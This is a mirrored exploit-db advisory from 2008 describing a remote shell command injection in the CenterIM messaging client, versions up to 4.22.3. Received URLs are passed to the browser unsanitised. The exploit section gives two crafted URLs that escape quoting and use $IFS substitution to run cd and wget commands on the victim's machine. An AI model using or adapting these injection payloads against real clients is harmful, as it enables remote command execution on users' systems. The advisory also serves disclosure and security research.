bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/remote/5283.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

47 lines
No EOL
1.1 KiB
Text
Raw Permalink Blame History

#######################################################################
Application: CenterIM
http://www.centerim.org/index.php/Main_Page
Versions: centerim <= 4.22.3
OS: Linux
Bug: Execution of shell commands
Exploit: remote
Date: 15 March 2008
Author: Brian Fonfara (w00)
eMail: brian.fonfara@gmx.de
Web: newb.kicks-ass.net
#######################################################################
1) Bug
2) Exploit
#######################################################################
=======
1) Bug
=======
Received URLs in the message window do not get checked for illegal
characters, like "\'", "\"", ";", "$", "{", "}", "&&" and "||"
#######################################################################
===========
2) Exploit
===========
Standard settings:
- Browser already open:
http://gidf.de/centerim)';cd$IFS$HOME/Desktop;wget${IFS}http://google.de;'(
- New browser instance:
http://gidf.de/centerim"&cd$IFS$HOME/Desktop;wget${IFS}http://google.de"
#######################################################################
Greets to: mrks
# milw0rm.com [2008-03-20]
Reference in a new issue View git blame Copy permalink